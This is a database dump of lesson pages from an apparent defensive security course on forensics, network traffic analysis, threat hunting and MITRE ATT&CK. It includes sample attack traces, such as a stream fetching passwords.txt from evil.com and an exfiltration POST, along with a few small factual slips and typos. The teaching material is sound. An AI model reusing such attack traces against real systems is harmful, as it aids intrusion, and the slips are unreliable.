(610, 278, '## Module 27 Review\nYou have learned the NIST IR Cycle:\n1.  **Prep**: Be ready.\n2.  **Detect**: Find it.\n3.  **Contain**: Stop it. (Isolate).\n4.  **Eradicate/Recover**: Fix it.\n5.  **Post-Incident**: Learn from it.\n\nNext: Digital Forensics (The science of evidence preservation).', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 14:19:16'),
(611, 281, '## What is Digital Forensics?\n\n**Digital Forensics** is the science of identifying, preserving, recovering, analyzing, and presenting facts about digital evidence. It is CSI for computers.\n\n### The Goal\nThe goal is not just \"Find the bad guy\". It is to answer the W-questions:\n*   **Who** did it? (Attribution).\n*   **What** did they do? (Actions).\n*   **When** did it happen? (Timeline).\n*   **How** did they get in? (Root Cause).\n\n### Forensic Soundness (Admissibility)\nIn a court of law, evidence must be **admissible**.\n*   If you boot up the suspect\'s laptop to look around, you have modified the evidence (timestamps changed, temporary files created). A defense lawyer will argue: \"The analyst tampered with the device. The malware could have been planted by the analyst.\"\n*   **Rule #1**: Never work on the original evidence. Always work on a forensic copy (Image).\n*   **Rule #2**: Verify integrity using Hashes.\n\n### Types of Forensics\n1.  **Disk Forensics**: Analyzing hard drives, USBs. (Finding deleted files).\n2.  **Memory Forensics**: Analyzing RAM. (Finding running malware, encryption keys, chat logs).\n3.  **Network Forensics**: Analyzing PCAPs and logs.\n4.  **Mobile Forensics**: iOS/Android analysis.\n\n### Locard\'s Exchange Principle\n\"Every contact leaves a trace.\"\nIn the physical world, a burglar leaves fingerprints and takes mud on their shoes.\nIn the digital world, a hacker leaves logs, registry keys, and cache files, and takes data. It is impossible to interact with a system without changing it.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(612, 282, '## Live vs. Dead Forensics & Order of Volatility\n\nWhen you approach a compromised machine, you have a choice: pull the plug or analyze it live?\n\n### Order of Volatility (RFC 3227)\nData disappears at different rates when power is lost. You must capture the most volatile data *first*.\n\n1.  **CPU Registers, Cache** (Nanoseconds). *Identical to impossible to capture usually.*\n2.  **System Memory (RAM)** (Seconds). *Contains keys, passwords, unsaved documents, running processes.*\n3.  **Network State** (Seconds). *Active connections to the hacker.*\n4.  **Running Processes** (Seconds).\n5.  **Disk (HDD/SSD)** (Years). *Files, Logs.*\n6.  **Remote Logs / Backups** (Years).\n7.  **Physical Configuration** (Forever).\n\n**Golden Rule**: If you pull the plug, **RAM is gone forever**. If the disk was encrypted (BitLocker) and the key was in RAM, you have locked yourself out permanently.\n\n### Dead Forensics (Post-Mortem)\n*   System is powered off.\n*   Hard drive is removed.\n*   Imaged using a Write Blocker.\n*   Analyzed in a lab.\n*   *Pros*: Safe, no risk of altering data.\n*   *Cons*: No RAM, no network state. Rootkits are inactive (harder to see).\n\n### Live Forensics\n*   System is running.\n*   You insert a USB with trusted tools (DumpIt, FTK Imager Lite).\n*   You dump RAM and run triage scripts.\n*   *Pros*: Captures encryption keys, active connections.\n*   *Cons*: **You alter the system**. Inserting a USB changes the registry. Running a tool consumes RAM. You must document *exactly* what you did to explain the changes in court.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(613, 283, '## Evidence Handling & Chain of Custody\n\nIf you cannot prove who held the evidence, the evidence is worthless.\n\n### Chain of Custody (CoC)\nA legal document that tracks the life of a piece of evidence.\n*   **Fields**:\n    *   Item Description: \"Seagate 1TB HDD, Serial #XYZ\".\n    *   Date/Time: \"2023-10-27 14:00\".\n    *   Released By: \"John Doe (Analyst)\".\n    *   Received By: \"Jane Smith (Evidence Locker Manager)\".\n    *   Reason: \"Overnight Storage\".\n*   **Gap in Chain**: If the drive was logged out on Friday and logged back in on Monday, but nobody signed for it over the weekend, the Defense will say: \"Someone replaced the drive.\" Case dismissed.\n\n### Evidence Integrity (Hashing)\nHow do we prove the file hasn\'t changed in 5 years? **Hashing**.\n*   **MD5 / SHA1**: Old, broke. (Collisions possible).\n*   **SHA256**: The standard.\n*   **Procedure**:\n    1.  Acquire the drive image.\n    2.  Calculate SHA256 immediatey. (e.g., `A1B2...`).\n    3.  Record `A1B2...` in the CoC.\n    4.  Six months later in court, hash the drive again.\n    5.  It MUST match `A1B2...` exactly. If one bit changed, the hash changes completely.\n\n### The Evidence Locker\n*   Physical security.\n*   Restricted access (Badge in/out).\n*   Faraday Bags: Bags lined with metal mesh to block radio signals. Use these for Mobile Phones (so they don\'t receive a \"Remote Wipe\" command from the iCloud/Google).', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(614, 284, '## Disk Imaging & Acquisition\n\nCopying a file (`Ctrl+C, Ctrl+V`) is NOT forensic acquisition. Copying only copies the *active* data. It ignores \"Slack Space\" and \"Deleted Files\".\n\n### Forensic Image\nA bit-by-bit clone of the drive. It copies every 0 and 1, including the empty space (where deleted files live).\n*   **Formats**:\n    *   **.dd (Raw)**: Pure dump.\n    *   **.E01 (EnCase)**: The industry standard. Includes compression, password protection, and metadata (Case number, Investigator Name) inside the file header.\n\n### Write Blockers\nA hardware device that sits between the suspect drive and your computer.\n*   **Function**: It physically cuts the \"Write\" wire. Data can flow *from* the suspect drive, but NOTHING can flow *to* it.\n*   **Mandatory**: If you attach a Windows drive to your PC without a blocker, Windows will automatically mount it, update \"Last Access\" timestamps, create \".Trash\" folders, and corrupt the evidence instantly.\n\n### Tools\n*   **FTK Imager**: Free, standard. can capture RAM and Disk.\n*   **Guymager (Linux)**: fast open source imager.\n*   **dd**: The classic Linux command. `dd if=/dev/sda of=/evidence/image.dd`.\n\n### Verification\nAfter imaging, the Imager will automatically hash the Source (Physical Drive) and the Destination (Image File). They must match.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(615, 285, '## File System Analysis: NTFS & Timestamps\n\nThe file system acts as the librarian of the drive.\n\n### NTFS (New Technology File System)\nThe standard Windows file system.\n*   **$MFT (Master File Table)**: The heart of NTFS. It is a hidden file that contains a record for *every* file on the drive.\n    *   It stores: File Name, Size, Permissions, Timestamps, and **Physical Location** on disk.\n*   **Resident Files**: If a file is very small (< 700 bytes), NTFS stores the content *directly inside the MFT record* to save space.\n*   **Deleted Files**:\n    *   When you delete a file, Windows does NOT erase the data.\n    *   It simply marks the MFT entry as \"Free\".\n    *   The data stays on the disk until a new file overwrites it. This is why forensics can recover deleted files.\n\n### Timestamps (MAC Times)\nEvery file has 4 timestamps (Standard MAC + Entry Modified).\n*   **M**odified: Content changed. (e.g., \"Save\" in Word).\n*   **A**ccessed: File read/opened. (Looking at a picture).\n*   **C**reated: File created on *this* volume. (Moving a file updates Created Date!).\n*   **B**orn (Entry Modified): The MFT record changed.\n\n### Time Stomping\nAttackers can use tools (like `touch` or `SetMace`) to modify timestamps to hide their tracks.\n*   *Detection*: Often they miss the \"nanosecond\" precision or the $FileName attribute (NTFS has two sets of timestamps: $Standard_Information and $FileName). If they mismatch, it\'s stomping.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(616, 286, '## Windows Artifacts: Where the Secrets Hides\n\nWindows is a messy roommate. It keeps records of *everything* you do to improve \"User Experience\". Forensics exploits this.\n\n### 1. Prefetch\n*   **Location**: `C:WindowsPrefetch`\n*   **Purpose**: Speed up app loading.\n*   **Artifact**: Shows **Name of Executable** run, **First/Last Run Time**, and **Run Count**.\n*   **Use**: \"Did the suspect run CCleaner? Yes, 5 times. Last time was 10 minutes before we arrived.\"\n\n### 2. ShimCache (AppCompatCache)\n*   **Location**: Registry (SYSTEM hive).\n*   **Purpose**: Compatibility settings for old apps.\n*   **Artifact**: Tracks executables present on the system, even if they were deleted.\n*   **Use**: Proving that `malware.exe` existed on the system in the past.\n\n### 3. Jump Lists & LNK Files\n*   **Location**: User Profile.\n*   **Purpose**: \"Recent Files\" in Taskbar/Start Menu.\n*   **Artifact**: Shows files accessed by the user.\n*   **Use**: \"The user opened `stolen_plans.pdf` from a USB drive `E:`.\"\n\n### 4. Registry Hives\n*   **SAM**: User accounts, password hashes.\n*   **SYSTEM**: System config, Timezone, USB history (**USBStor** - proves a specific USB serial number was plugged in).\n*   **SOFTWARE**: Installed programs, Versions.\n*   **NTUSER.DAT**: Per-user settings. \"Recent Docs\", Search History, Typed URLs in IE/Explorer.\n\n### 5. Amcache.hve\n*   **Use**: Stores SHA1 hashes of executed programs.\n*   **Golden**: You can map a file hash to a timestamp of execution.\n\n### 6. Shellbags\n*   **Location**: Registry (USRCLASS.DAT).\n*   **Use**: Tracks which **Founders/Directories** the user browsed in Explorer.\n*   **Power**: It persists even if the folder is deleted. You can construct a map of the user\'s file system knowledge.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(617, 287, '## Module 28 Review\nYou have scraped the surface of Digital Forensics:\n1.  **CoC**: Protect the evidence integrity.\n2.  **Imaging**: Use a Write Blocker.\n3.  **Artifacts**: Windows creates trails (Prefetch, Registry, LNK) for everything you do.\n\nNext: Network Traffic Analysis (Packet Inspection).', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 14:19:16'),
(618, 291, '## Why Analyze Network Traffic?\n\nNetwork Traffic Analysis (NTA) is looking at the wire. \"The Packet Never Lies.\" Logs can be deleted; Endpoints can be rootkitted to hide processes; but if data was sent, the packets existed.\n\n### The Scope\n*   **North/South**: Traffic entering/leaving your network (Internet). Found at the Firewall/Gateway.\n*   **East/West**: Traffic moving between internal servers. Found at Core Switches (Internal Taps).\n\n### The Challenge: Encryption\n90% of web traffic is HTTPS (TLS encrypted).\n*   **Problem**: We can\'t see the payload. We don\'t know if the user downloaded a cat picture or malware.\n*   **Solution 1**: **SSL Inspection (Decryption)**. A proxy intercepts traffic, decrypts it, inspects it, re-encrypts it. Expensive and raises privacy/legal issues (Banking/Healthcare).\n*   **Solution 2**: **Traffic Metadata Analysis**. (JA3).\n    *   Even encrypted info has fingerprints.\n    *   The \"Client Hello\" packet in TLS sends specific cipher suites.\n    *   A standard Chrome Browser sends one set.\n    *   The \"Metasploit\" hacking tool sends a different set.\n    *   JA3 creates a hash of this handshake to identify the *application* even if the *content* is encrypted.\n\n### Use Cases\n*   Detecting C2 Beaconing.\n*   Finding Data Exfiltration (Large uploads).\n*   Spotting scanning activity.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(619, 292, '## Packet Capture (PCAP) Fundamentals\n\nA PCAP file contains the raw data captured from the network card.\n\n### The TCP 3-Way Handshake\nTo understand traffic, you must understand TCP.\n1.  **SYN**: \"Hi, I want to connect.\" (Client -> Server)\n2.  **SYN-ACK**: \"Okay, I see you. I\'m ready.\" (Server -> Client)\n3.  **ACK**: \"Great, let\'s go.\" (Client -> Server)\n\n**Analyst Check**:\n*   If you see lots of SYNs but no SYN-ACKs? -> **SYN Flood (DoS)** or **Port Scan** (host is down).\n*   If you see SYN, SYN-ACK, RST? -> Connection rejected.\n\n### TCP Flags (The Signal Flags)\n*   **SYN**: Synchronize. Start.\n*   **ACK**: Acknowledge. Confirm.\n*   **FIN**: Finish. Graceful exit. (\"I\'m done, goodbye\").\n*   **RST**: Reset. Abort. (\"Get lost\" or \"I crashed\").\n*   **PSH**: Push. Send data now.\n\n### Protocol Hierarchy\n1.  **Ethernet**: MAC Addresses. (Local Network).\n2.  **IP**: IP Addresses. (Internet).\n3.  **TCP/UDP**: Ports. (Application Service).\n4.  **Application**: HTTP, DNS, SMB. (The Data).\n\nWhen analyzing, work up the stack. First check IP (Who?), then Port (What Service?), then App (What Content?).', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(620, 293, '## Wireshark Essentials\n\nWireshark is the microscope for packets.\n\n### 1. Capture Filters vs. Display Filters\n*   **Capture Filters (BPF)**: Set *before* you record. Discards packets.\n    *   `host 192.168.1.1` -> Only save packets involving this IP.\n    *   **Pro**: saves disk space. **Con**: If you didn\'t capture it, you can\'t see it later.\n*   **Display Filters**: Set *after* recording. Just hides packets from view.\n    *   `ip.addr == 192.168.1.1`\n    *   **Pro**: Flexible. Non-destructive.\n\n### 2. Essential Display Filters\n*   `http.request.method == \"POST\"`: Show me data uploads.\n*   `tls.handshake.type == 1`: Show me HTTPS Client Hellos (domain names).\n*   `dns.flags.response == 0`: Show me DNS queries.\n*   `tcp.flags.syn == 1 and tcp.flags.ack == 0`: Show me connection attempts.\n\n### 3. Follow TCP Stream\nRight-click a packet -> \"Follow TCP Stream\".\n*   Wireshark reassembles the conversation.\n*   Instead of seeing 50 packets, you see the reconstructed text:\n    *   `GET /passwords.txt HTTP/1.1`\n    *   `Host: evil.com`\n    *   `...`\n\n### 4. Export Objects\nFile -> Export Objects -> HTTP.\n*   Wireshark can extract files downloaded in the traffic.\n*   \"Oh, the user downloaded `virus.exe`? I can save that file from the PCAP to my desktop and hash it.\"', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(621, 294, '## Analyzing HTTP Traffic\n\nHTTP is the language of the web (and most malware).\n\n### The Request\n*   **Method**:\n    *   GET: Retrieve data.\n    *   POST: Send data (Logins, Uploads). **Focus on POSTs**.\n*   **User-Agent**: Who is asking?\n    *   `Mozilla/5.0... Chrome/90...`: Normal Browser.\n    *   `Python-urllib/3.0`: Python Script. (Suspicious on a user laptop).\n    *   `Struts-Shock`: Exploit tool.\n*   **Host**: The domain.\n*   **Referer**: Where did you come from? (Did you click a link on Google, or a link on a Phishing site?)\n\n### The Response\n*   **Status Codes**:\n    *   `200 OK`: Success.\n    *   `301/302`: Redirect.\n    *   `401/403`: Unauthorized. (Brute Force?)\n    *   `404`: Not Found. (Scanning?)\n    *   `500`: Server Error. (Exploit crashed the server?)\n\n### Analysis Scenario\n1.  **Alert**: \"Suspicious User-Agent\".\n2.  **Packet**: `POST /upload.php` from IP 10.10.10.5. User-Agent: `DarkSides/1.0`.\n3.  **Stream**: The content of the POST is a large blob of encrypted data.\n4.  **Verdict**: C2 Exfiltration.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(622, 295, '## Detecting Malicious Traffic\n\nWhat does \"Bad\" look like on the wire?\n\n### 1. Beaconing (Heartbeats)\n*   **Regularity**: Every 60 seconds (Delta Time).\n*   **Small Size**: Packets are identical in size.\n*   **Jitter**: Sophisticated beacons add randomization (60s, 62s, 58s).\n\n### 2. Data Exfiltration\n*   **Large Outbound**: Internal IP sending GBs to External IP.\n*   **Protocol Misuse**:\n    *   **DNS Tunneling**: Huge volume of DNS queries to the same domain.\n    *   **ICMP Tunneling**: Ping packets containing data payloads instead of \"abcdefg\".\n*   **Steganography**: Hiding data inside images. (Hard to detect on wire without payload analysis).\n\n### 3. Scanning\n*   **Port Scan**: One IP sending SYNs to 1000 ports on one target.\n*   **Net Scan**: One IP sending SYNs to Port 445 on 1000 targets.\n\n### 4. Cleartext Credential Leaks\n*   **FTP / Telnet / HTTP (Basic Auth)**: Passwords sent in clear text.\n*   **Analyst**: \"Follow Stream\". Search for \"Password\" or \"Pass\".', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(623, 296, '## Zeek (formerly Bro)\n\nWireshark is great for 1 packet. Zeek is great for 1 million packets.\n\n### What is Zeek?\nIt acts like a NIDS, but instead of \"Alerting\", it generate **Transaction Logs**.\nIt summarizes traffic into readable Tab-Separated Values (TSV) logs.\n\n### Key Logs\n*   **conn.log**: All TCP/UDP connections. (Source, Dest, Duration, Bytes).\n*   **http.log**: All HTTP requests (URI, User-Agent, Referrer).\n*   **dns.log**: All DNS queries.\n*   **ssl.log**: SSL certificates seen.\n\n### Why use it?\nNTA with Zeek is faster.\n*   **Question**: \"Did anyone visit `evil.com`?\"\n*   *Wireshark*: Open 50GB pcap, wait 10 minutes to load, filter `dns contains evil`.\n*   *Zeek*: `grep \"evil.com\" dns.log`. (Instant).', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 14:20:29'),
(624, 297, '## Module 29 Review\nNTA gives you the ground truth.\n*   **Wireshark** for deep inspection of a single stream.\n*   **Zeek** for high-level logging of all traffic.\n*   **HTTPS** hides content, but metadata (JA3, certificates, size) still reveals a lot.\n\nNext: Proactive defense with Threat Hunting.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 14:20:29'),
(625, 301, '## What is Threat Hunting?\n\n**Threat Hunting** is the proactive search for cyber threats that are lurking undetected in a network.\n\n### The Problem with Passive Defense\nTraditional security (SIEM, EDR, IDS) is **Reactive**.\n*   It waits for an alarm to go off.\n*   \"If Signature X matches, Send Alert.\"\n*   **The Flaw**: Sophisticated attackers (APTs) use custom tools and \"Living off the Land\" techniques (PowerShell, WMI) that do NOT trigger signatures. They can dwell in a network for **months** (Average Dwell Time is ~200 days).\n\n### The Hunter\'s Mindset\nThreat Hunting is **Proactive**.\n*   **Analogy**:\n    *   **Reactive**: Waiting for your burglar alarm to ring.\n    *   **Proactive**: Walking around your house with a baseball bat, checking under the beds, even though the alarm didn\'t ring.\n*   **Assumption**: \"We are already compromised. I just haven\'t found it yet.\"\n\n### Who hunts?\n*   It requires a human analyst. AI cannot hunt (yet) because hunting requires **Creativity** and **Intuition**.\n*   \"That admin logged in at 2 AM. It\'s not an alert because he *is* an admin. But I know he\'s on vacation in Hawaii. That\'s suspicious.\"\n\n### The Three Pillars of Hunting\n1.  **Triggers**: What starts a hunt? (Intel, Hypothesis).\n2.  **Data**: You can\'t hunt what you can\'t see. (Logs).\n3.  **Tools**: SIEM, EDR, Jupyter Notebooks.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(626, 302, '## Hunting vs. Detection: What\'s the difference?\n\nIt is easy to confuse Incident Response, Detection Engineering, and Threat Hunting.\n\n### 1. Detection Engineering (The Ref)\n*   **Goal**: Automate the known.\n*   **Process**: \"I know Emotet uses this registry key. I will write a SIEM rule for it.\"\n*   **Output**: An Alert (Signature).\n\n### 2. Incident Response (The Firefighter)\n*   **Goal**: Put out the fire.\n*   **Process**: \"The SIEM alerted on Emotet! Delete it! Isolate the host!\"\n*   **Output**: A clean machine.\n\n### 3. Threat Hunting (The Detective)\n*   **Goal**: Find the unknown.\n*   **Process**: \"I wonder if anyone is using PowerShell to download files? There is no rule for it because admins do it too. I will filter the logs and look for anomalies.\"\n*   **Output**:\n    1.  **Nothing** (The network is clean).\n    2.  **An Incident** (I found a hacker! -> Hand off to IR team).\n    3.  **A New Rule** (I found a simplified way to detect this. -> Hand off to Detection Engineers).\n\n### The Cycle\nHunting feeds Detection.\n1.  Hunter finds a new attack pattern manually.\n2.  Hunter explains it to Detection Engineer.\n3.  Engineer writes a rule.\n4.  Now the SIEM detects it automatically.\n5.  Hunter moves on to the next unknown threat.\n\n**Hunting is not just \"looking at logs randomly\".** That is called \"log staring\" and it is useless. Hunting must be structured.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(627, 303, '## The Hunting Loop\n\nTo avoid \"Rabbit Holes\" (wasting 8 hours looking at nothing), hunters follow a loop.\n\n### 1. Hypothesis Generation\n*   Start with a question.\n*   \"If an attacker were inside, how would they move laterally?\"\n*   *Hypothesis*: \"Attackers might be using Windows Admin Shares (C$) to move between PCs.\"\n\n### 2. Data Collection & Processing\n*   \"Do I have logs for this? Yes, Windows Event 5140 (Share Access).\"\n*   \"Is it parsed in Splunk? Yes.\"\n\n### 3. Trigger / Investigation\n*   Run the query.\n*   \"Show me all SMB access to C$ shares.\"\n*   Result: 10,000 events. (Too many).\n*   **Filter**: \"Exclude the Backup Service Admin account.\" -> 500 events.\n*   **Filter**: \"Exclude the Domain Controllers.\" -> 50 events.\n*   **Investigate**: Look at the remaining 50. Are they normal admins?\n\n### 4. Discovery\n*   \"Wait, why is the \'Receptionist\' account accessing the CEO\'s laptop C$ share?\"\n*   **Verdict**: Malicious.\n\n### 5. Enrichment & Automation\n*   \"That was a good catch. Let\'s automate it.\"\n*   Create a rule: \"Alert if Non-IT-Admin accesses C$ share.\"\n\n### Models\n*   **The OODA Loop**: Observe, Orient, Decide, Act.\n*   **Sqrrl’s Hunting Loop**: Create Hypothesis -> Investigate -> Uncover Patterns -> Enrich Analytics.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(628, 304, '## Hypothesis-Driven Hunting\n\nThe most common and effective type of hunting. A hypothesis must be **testable**.\n\n### Good Hypothesis Examples\n*   **Intel-Driven**: \"FireEye published a report saying APT29 uses `certutil.exe` to download malware. *Hypothesis: APT29 is doing that in our network.*\"\n*   **Situational**: \"We just fired a Sysadmin. *Hypothesis: He might have left a backdoor account.*\"\n*   **Domain-Based**: \"We have a lot of PowerShell usage. *Hypothesis: Attackers are using PowerShell Empire C2 agents hiding in plain sight.*\"\n\n### How to build a Hypothesis\nUse the **MITRE ATT&CK Framework**.\n1.  Pick a Tactic (e.g., Persistence).\n2.  Pick a Technique (e.g., Scheduled Tasks).\n3.  Form Hypothesis: \"Attackers are maintaining persistence by creating Scheduled Tasks with random names.\"\n\n### The \"Null\" Hypothesis\nIn science, you try to disprove the Null Hypothesis (\"There is no attacker\").\n*   You are trying to find evidence that rejects the idea that your network is clean.\n\n### Scenario\n*   **News**: A new zero-day in Outlook allows RCE via preview pane.\n*   **Hypothesis**: \"An attacker has exploited this zero-day against our Executives.\"\n*   **Search**: Look for `outlook.exe` spawning child processes like `cmd.exe` or `powershell.exe`.\n*   **Outcome**: Zero results.\n*   **Conclusion**: \"We are likely clean from this specific threat *at this moment*.\" (Record this search so you don\'t repeat it tomorrow).', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(629, 305, '## Data Sources for Hunting\n\nYou generally need three types of data to hunt effectively.\n\n### 1. Process Execution (Endpoint is King)\n*   **What**: Windows Event 4688 / Sysmon Event 1 / EDR Data.\n*   **Why**: Shows exactly what ran.\n*   **Hunt**:\n    *   \"Show me processes running from `Temp` or `Downloads` folders.\"\n    *   \"Show me `svchost.exe` without a parent of `services.exe`.\"\n\n### 2. Network Connections ( The Wire)\n*   **What**: Firewall logs, Proxy logs, DNS logs.\n*   **Why**: Shows C2 and Exfiltration.\n*   **Hunt**:\n    *   \"Show me long connections (> 4 hours).\"\n    *   \"Show me connections to countries where we have no business.\"\n    *   \"Show me user laptops connecting directly to other user laptops (Peer-to-Peer lateral movement).\"\n\n### 3. Authentication Logs (Identity)\n*   **What**: Windows 4624/4625, VPN logs, Azure AD Sign-ins.\n*   **Why**: Shows stolen credentials.\n*   **Hunt**:\n    *   \"Show me a user logging in from 2 different cities in 1 hour.\"\n    *   \"Show me a Service Account logging in interactively (Service accounts should be batch/service types, not humans typing passwords).\"\n\n### Quality vs. Quantity\nMore logs is not always better.\n*   **Retention**: Hunting requires history. If you only keep 7 days of logs, you can\'t find an attacker who got in last month.\n*   **Granularity**: Firewall logs showing \"Block\" are useless for hunting. You need the \"Allow\" logs to find the successful attacker.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(630, 306, '## Hunting Techniques\n\n### 1. Stacking (Frequency Analysis)\nThe art of counting. \"Least Frequency of Occurrence\".\n*   **Concept**: Bad things are rare. Good things are common.\n*   **Method**:\n    *   Get all User-Agent strings from Proxy logs (1 million logs).\n    *   Group by User-Agent name.\n    *   Count them.\n    *   **Sort Ascending (Bottom Up)**.\n*   **Start**:\n    *   `Mozilla/5.0...` (Count: 900,000) -> Legit.\n    *   `curl/7.0` (Count: 50,000) -> Devs using curl.\n    *   `Python-urllib` (Count: 5) -> **INVESTIGATE**. Why 5? Who is running Python scripts connecting to the web?\n\n### 2. Clustering\nGrouping similar objects.\n*   You have 1000 processes named `svchost.exe`.\n*   Group them by \"Parent Process\", \"Command Line Arguments\", and \"User\".\n*   Cluster A: 990 run by SYSTEM, parent services.exe. (Normal).\n*   Cluster B: 10 run by \"Bob\", parent explorer.exe. (Anomalous).\n\n### 3. Baseline Comparison\n*   \"What is normal for Monday?\"\n*   Compare this Monday\'s traffic volume to the average of the last 10 Mondays.\n*   If volume is +500%, investigate.\n\n### 4. Grouping (Long Tail Analysis)\nSimilar to stacking but looking for *unique* values in high-volume datasets.\n*   Example: Hunt for rare file extensions executed.\n    *   `.exe`, `.dll` (Normal).\n    *   `.scr`, `.pif`, `.hta` (Rare and often malicious).\n    *   If you see `invoice.scr`, it is almost certainly malware.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
(631, 307, '## Module 30 Review\nThreat Hunting pushes the security posture forward.\n*   It finds what the SIEM missed.\n*   It assumes breach.\n*   It feeds new rules back into detection.\n\nNext: The map of the attacker\'s mind (MITRE ATT&CK).', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 14:20:29'),
(632, 311, '## What is MITRE ATT&CK?\n\n**MITRE ATT&CK** (Adversarial Tactics, Techniques, and Common Knowledge) is the periodic table of hacking. It is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.\n\n### Why was it created?\nBefore ATT&CK, we described threats vaguely: \"The malware infects the computer.\"\nATT&CK forces us to be specific: \"The malware achieves **Persistence** [TA0003] using **Registry Run Keys** [T1547.001].\"\n\n### The Structure\nIt is a Matrix (Grid).\n1.  **Tactics (Columns)**: The goal. (Why are they doing this? e.g., \"To steal passwords\").\n2.  **Techniques (Cells)**: The method. (How are they doing this? e.g., \"OS Credential Dumping\").\n3.  **Procedures (Details)**: The specific implementation. (e.g., \"Using Mimikatz.exe\").\n    *   This gives us the acronym **TTPs**.\n\n### Why Analysts Need It\n1.  **Standardized Language**: A distinct common language. \"T1059.001\" means the same thing to an analyst in Japan as it does to one in the USA.\n2.  **Mapping Defenses**: You can map your EDR coverage to the matrix. \"We cover 90% of Execution techniques, but only 10% of Exfiltration techniques. We need to buy a DLP tool.\"\n3.  **Threat Intelligence**: Reports say \"Group X uses T1053\". You can instantly look up T1053 (Scheduled Task) and see if you can detect it.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(633, 312, '## Tactics: The \"Why\" (The Top Row)\n\nTactics represent the **Adversary\'s Goals**. There are 14 Tactics in the Enterprise Matrix. You should memorize the flow of an attack.\n\n1.  **Reconnaissance**: Gathering info (Scanning, LinkedIn research).\n2.  **Resource Development**: Buying servers, stealing accounts.\n3.  **Initial Access**: Getting in (Phishing, Exploit).\n4.  **Execution**: Running code (`calc.exe`).\n5.  **Persistence**: Staying in (Reboot survival).\n6.  **Privilege Escalation**: Getting Root/Admin.\n7.  **Defense Evasion**: Hiding (Deleting logs, turning off AV).\n8.  **Credential Access**: Stealing passwords.\n9.  **Discovery**: Looking around (\"Where am I?\").\n10. **Lateral Movement**: Jumping to other computers.\n11. **Collection**: Gathering data needed.\n12. **Command and Control (C2)**: Talking to the boss.\n13. **Exfiltration**: Stealing the data (Sending it out).\n14. **Impact**: Destroying data (Wiping, Encrypting).\n\n**Note**: Attackers don\'t always follow this order linearly, but it is the general lifecycle.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(634, 313, '## Techniques: The \"How\" (The Cells)\n\nUnder each Tactic, there are many Techniques. A Technique is a specific way to achieve the goal.\n\n### Sub-Techniques\nIn 2020, MITRE added Sub-Techniques (T1xxx.001) because the matrix was getting too crowded.\n*   **Technique**: **Brute Force (T1110)**.\n    *   **Sub-Technique**: .001 Password Guessing.\n    *   **Sub-Technique**: .002 Password Cracking.\n    *   **Sub-Technique**: .003 Password Spraying.\n    *   **Sub-Technique**: .004 Credential Stuffing.\n\n### Example: Phishing (T1566)\n*   **Tactic**: Initial Access.\n*   **Technique**: Phishing.\n*   **Sub-Techniques**:\n    *   Spearphishing Attachment (Sending a doc).\n    *   Spearphishing Link (Sending a URL).\n    *   Spearphishing via Service (LinkedIn/WhatsApp message).\n\n### Using the Knowledge Base\nWhen you click a Technique on the MITRE website, it tells you:\n1.  **Description**: How it works.\n2.  **Procedure Examples**: Which hacker groups have used this? (e.g., \"APT28 used this in 2016\").\n3.  **Mitigations**: How to stop it (Disable RDP).\n4.  **Detection**: How to find it (Event ID 4624).\n*This is basically a cheat sheet for your job.*', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
(635, 314, '## Navigating the Matrix\n\nYou will use the **MITRE ATT&CK Navigator**, a web-based tool to color-code the matrix.\n\n### Use Case 1: Threat Profiling\n*   Select \"APT29\" (The SolarWinds hackers).\n*   The Navigator highlights all techniques used by APT29 in Red.\n*   Now you know exactly what to look for to find them.\n\n### Use Case 2: Defense Coverage \"Heatmap\"\n*   Color Green: Techniques we can **Prevent** (Firewall blocks).\n*   Color Yellow: Techniques we can **Detect** (SIEM rules alerts).\n*   Color Red: Techniques we are **Blind** to (No logs).\n*   *Result*: A visual map showing your boss where to spend budget. \"Look, we are all Red in the \'Cloud\' column. We need cloud security.\"\n\n### Layers\nYou can layer views.\n*   Layer 1: Defenses.\n*   Layer 2: APT29.\n*   **Overlay**: Show where APT29 overlaps with our Red (Blind) spots. **This is your priority list**.', 'markdown', 15, '2025-12-26 23:09:24', '2025-12-29 15:11:15'),
